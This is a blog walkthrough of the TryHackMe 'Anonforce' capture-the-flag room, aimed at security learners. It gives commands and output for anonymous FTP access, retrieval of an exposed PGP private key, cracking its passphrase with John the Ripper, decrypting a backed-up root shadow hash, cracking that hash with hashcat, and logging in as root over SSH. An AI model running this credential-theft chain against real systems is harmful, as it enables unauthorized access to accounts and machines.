Sign in Subscribe
Try Hack Me

Try Hack Me - Anonforce

boot2root machine for FIT and bsides guatemala CTF

Marios Daskalas

5 min read
Share
Try Hack Me - Anonforce
Try Hack Me

Howdy my fellow Cyber Enthusiasts! Welcome to another room Try Hack Me offers! So let's dive in! πŸ˜„ You can click on the "Start AttackBox" button for a Linux machine to be available on the right-side of your page, so you can follow this walkthrough.

Let's start with a basic Nmap scan to enumerate the target.

$ IP=10.112.130.247

$ sudo nmap -sV -p- $IP
[sudo] password for [redacted]: 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-11 19:25 +0300
Nmap scan report for 10.112.130.247
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.92 seconds

We noticed that there is an ftp server running.

21/tcp open  ftp     vsftpd 3.0.3

Let's try to connect it as an anonymous user.

$ ftp anonymous@$IP

Connected to 10.112.130.247.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

There is no need for a password. Gotcha! πŸ˜„ Let's navigate to the server.

ftp> cd home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||33921|)
150 Here comes the directory listing.
drwxr-xr-x    4 1000     1000         4096 Aug 11  2019 melodias
226 Directory send OK.
ftp> cd melodias
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||13728|)
150 Here comes the directory listing.
-rw-rw-r--    1 1000     1000           33 Aug 11  2019 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||60632|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*********************************|    33      213.42 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.70 KiB/s)
πŸ’‘
user.txt
$ cat user.txt
[redacted]
πŸ’‘
root.txt
ftp> ls 
229 Entering Extended Passive Mode (|||22917|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Aug 11  2019 bin
drwxr-xr-x    3 0        0            4096 Aug 11  2019 boot
drwxr-xr-x   17 0        0            3700 May 11 08:43 dev
drwxr-xr-x   85 0        0            4096 Aug 13  2019 etc
drwxr-xr-x    3 0        0            4096 Aug 11  2019 home
lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img -> boot/initrd.img-4.4.0-157-generic
lrwxrwxrwx    1 0        0              33 Aug 11  2019 initrd.img.old -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x   19 0        0            4096 Aug 11  2019 lib
drwxr-xr-x    2 0        0            4096 Aug 11  2019 lib64
drwx------    2 0        0           16384 Aug 11  2019 lost+found
drwxr-xr-x    4 0        0            4096 Aug 11  2019 media
drwxr-xr-x    2 0        0            4096 Feb 26  2019 mnt
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread
drwxr-xr-x    2 0        0            4096 Aug 11  2019 opt
dr-xr-xr-x   84 0        0               0 May 11 08:43 proc
drwx------    3 0        0            4096 Aug 11  2019 root
drwxr-xr-x   18 0        0             540 May 11 08:43 run
drwxr-xr-x    2 0        0           12288 Aug 11  2019 sbin
drwxr-xr-x    3 0        0            4096 Aug 11  2019 srv
dr-xr-xr-x   13 0        0               0 May 11 08:43 sys
drwxrwxrwt    9 0        0            4096 May 11 09:17 tmp
drwxr-xr-x   10 0        0            4096 Aug 11  2019 usr
drwxr-xr-x   11 0        0            4096 Aug 11  2019 var
lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz -> boot/vmlinuz-4.4.0-157-generic
lrwxrwxrwx    1 0        0              30 Aug 11  2019 vmlinuz.old -> boot/vmlinuz-4.4.0-142-generic
226 Directory send OK.

There is an interesting directory in /

drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 notread

Let's have a look over it. Nice, we have found two interesting files.

ftp> ls -la
229 Entering Extended Passive Mode (|||46631|)
150 Here comes the directory listing.
drwxrwxrwx    2 1000     1000         4096 Aug 11  2019 .
drwxr-xr-x   23 0        0            4096 Aug 11  2019 ..
-rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
-rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc
226 Directory send OK.
ftp> get backup.pgp
local: backup.pgp remote: backup.pgp
229 Entering Extended Passive Mode (|||6239|)
150 Opening BINARY mode data connection for backup.pgp (524 bytes).
100% |*********************************|   524      546.70 KiB/s    00:00 ETA
226 Transfer complete.
524 bytes received in 00:00 (11.02 KiB/s)
ftp> get private.asc
local: private.asc remote: private.asc
229 Entering Extended Passive Mode (|||35226|)
150 Opening BINARY mode data connection for private.asc (3762 bytes).
100% |*********************************|  3762        3.23 MiB/s    00:00 ETA
226 Transfer complete.
3762 bytes received in 00:00 (79.05 KiB/s)
πŸ’‘
gpg2john (sometimes written informally as β€œgpgp2john”) is a utility included with John the Ripper that extracts password-protected metadata from GNU Privacy Guard (.gpg / .pgp) files and converts it into a hash format that John the Ripper can analyze.
$ gpg2john private.asc > hash.txt

File private.asc

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
No password hashes left to crack (see FAQ)

$ john --show hash.txt
[redacted]

Now we can import the key using the following command.

$ gpg --import private.asc
gpg: key B92CD1F280AD82C2: "anonforce <[email protected]>" not changed
gpg: key B92CD1F280AD82C2: secret key imported
gpg: key B92CD1F280AD82C2: "anonforce <[email protected]>" not changed
gpg: Total number processed: 2
gpg:              unchanged: 2
gpg:       secret keys read: 1
gpg:  secret keys unchanged: 1

Next, we can decrypt it using the following command.

$ gpg --decrypt backup.pgp
gpg: encrypted with elg512 key, ID AA6268D1E6612967, created 2019-08-12
      "anonforce <[email protected]>"
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences

root:[redacted]:18120:0:99999:7:::

Now, copy paste the hash into a file called root.hash

We will use hashcat to crack the hash.

$ hashcat -m 1800 root.hash /usr/share/wordlists/rockyou.txt
πŸ’‘
Hashcat is a high-performance password recovery and security auditing tool designed to crack password hashes using CPUs, GPUs, and other hardware accelerators.
It supports hundreds of hash formats and is widely used by penetration testers, forensic analysts, and security researchers to:
- Audit password strength
- Recover lost passwords
- Test authentication security
- Benchmark hash resistance
πŸ’‘
We are using 1800 sha512crypt $6$, SHA512 (Unix) 2

For more information visit the following website.

https://hashcat.net/wiki/doku.php?id=example_hashes

Finally, connect using SSH.

$ ssh root@$IP          
The authenticity of host '10.112.130.247 (10.112.130.247)' can't be established.

$ root@ubuntu:~# cat root.txt
[redacted]

Congratulations! You have solved this room! πŸŽ‰ πŸŽ‰ πŸŽ‰

Sign up for more like this.

Enter your email
Subscribe
A digital lab where security meets strategy, data meets insight, and psychology meets code.
Dive into CTFs, Cyber Security, Data Science, and the Human Mind.